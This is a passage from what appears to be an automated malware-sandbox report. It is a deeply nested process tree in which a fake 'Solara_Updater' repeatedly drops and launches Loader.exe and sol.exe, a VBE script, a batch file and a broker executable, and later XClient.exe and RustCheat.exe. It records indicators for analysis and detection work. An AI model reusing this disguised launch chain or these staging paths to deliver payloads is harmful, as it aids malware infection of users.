                                                                                                          • Executes dropped EXE
                                                                                                          PID:2252
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                    11⤵
                                                                                                      PID:1852
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                        12⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2512
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                        12⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2536
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                          13⤵
                                                                                                            PID:2660
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                              14⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:2748
                                                                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                15⤵
                                                                                                                  PID:1344
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                            12⤵
                                                                                                              PID:2532
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                13⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2492
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                13⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1356
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                  14⤵
                                                                                                                    PID:380
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                      15⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:756
                                                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                        16⤵
                                                                                                                          PID:1924
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                    13⤵
                                                                                                                      PID:1644
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                        14⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2328
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                        14⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:1460
                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                          15⤵
                                                                                                                            PID:1756
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                              16⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:2272
                                                                                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                17⤵
                                                                                                                                  PID:1252
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                            14⤵
                                                                                                                              PID:1120
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                15⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:876
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                15⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1844
                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                  16⤵
                                                                                                                                    PID:1760
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                      17⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:1848
                                                                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                        18⤵
                                                                                                                                          PID:1108
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                    15⤵
                                                                                                                                      PID:3052
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                        16⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1976
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                        16⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2032
                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                          17⤵
                                                                                                                                            PID:3000
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                              18⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:2832
                                                                                                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                19⤵
                                                                                                                                                  PID:780
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                            16⤵
                                                                                                                                              PID:2832
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                17⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1600
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                17⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1784
                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                  18⤵
                                                                                                                                                    PID:1260
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                      19⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:1412
                                                                                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                        20⤵
                                                                                                                                                          PID:3044
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                    17⤵
                                                                                                                                                      PID:2468
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                        18⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2560
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                        18⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:688
                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                          19⤵
                                                                                                                                                            PID:1368
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                              20⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:2124
                                                                                                                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                21⤵
                                                                                                                                                                  PID:772
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                            18⤵
                                                                                                                                                              PID:1460
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                19⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1576
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                19⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:2052
                                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                  20⤵
                                                                                                                                                                    PID:296
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                      21⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:2088
                                                                                                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                        22⤵
                                                                                                                                                                          PID:2740
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                    19⤵
                                                                                                                                                                      PID:1840
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                        20⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:1720
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                          21⤵
                                                                                                                                                                            PID:2172
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                            21⤵
                                                                                                                                                                              PID:1352
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                            20⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:1884
                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                              21⤵
                                                                                                                                                                                PID:2628
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                  22⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:2568
                                                                                                                                                                                  • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                    "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                    23⤵
                                                                                                                                                                                      PID:1732
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                20⤵
                                                                                                                                                                                  PID:2928
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                    21⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:860
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                    21⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2360
                                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                      22⤵
                                                                                                                                                                                        PID:2280
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                          23⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:980
                                                                                                                                                                                          • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                            "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                            24⤵
                                                                                                                                                                                              PID:2724
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                        21⤵
                                                                                                                                                                                          PID:2640
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                            22⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2584
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                            22⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2356
                                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                              23⤵
                                                                                                                                                                                                PID:2224
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:2372
                                                                                                                                                                                                  • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                    "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                      PID:840
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                22⤵
                                                                                                                                                                                                  PID:1248
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                    23⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:3028
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                    23⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:1948
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                        PID:2268
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:2024
                                                                                                                                                                                                          • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                            "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                              PID:1692
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                          PID:2980
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                              PID:656
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                PID:752
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                  25⤵
                                                                                                                                                                                                                    PID:1256
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:2748
                                                                                                                                                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                        27⤵
                                                                                                                                                                                                                          PID:1228
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                      PID:3064
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                          PID:1460
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                            PID:1492
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                PID:2640
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  PID:2912
                                                                                                                                                                                                                                  • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                    "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                    28⤵
                                                                                                                                                                                                                                      PID:3040
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                25⤵
                                                                                                                                                                                                                                  PID:524
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                        PID:2256
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                          27⤵
                                                                                                                                                                                                                                            PID:1536
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              PID:532
                                                                                                                                                                                                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                29⤵
                                                                                                                                                                                                                                                  PID:2992
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                              PID:2052
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                27⤵
                                                                                                                                                                                                                                                  PID:840
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                    PID:2188
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                        PID:752
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                          29⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:1476
                                                                                                                                                                                                                                                          • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                            "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                            30⤵
                                                                                                                                                                                                                                                              PID:1820
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                        27⤵
                                                                                                                                                                                                                                                          PID:2604
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                            28⤵
                                                                                                                                                                                                                                                              PID:1784
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                PID:2912
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                  29⤵
                                                                                                                                                                                                                                                                    PID:1660
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                      30⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      PID:944
                                                                                                                                                                                                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                          PID:1076
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                    28⤵
                                                                                                                                                                                                                                                                      PID:380
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                        29⤵
                                                                                                                                                                                                                                                                          PID:1960
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                          29⤵
                                                                                                                                                                                                                                                                            PID:836
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                PID:2652
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                  31⤵
                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                  PID:1760
                                                                                                                                                                                                                                                                                  • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                    "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                      PID:1928
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                29⤵
                                                                                                                                                                                                                                                                                  PID:860
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                      PID:1476
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                      30⤵
                                                                                                                                                                                                                                                                                        PID:2888
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                          31⤵
                                                                                                                                                                                                                                                                                            PID:880
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              PID:2324
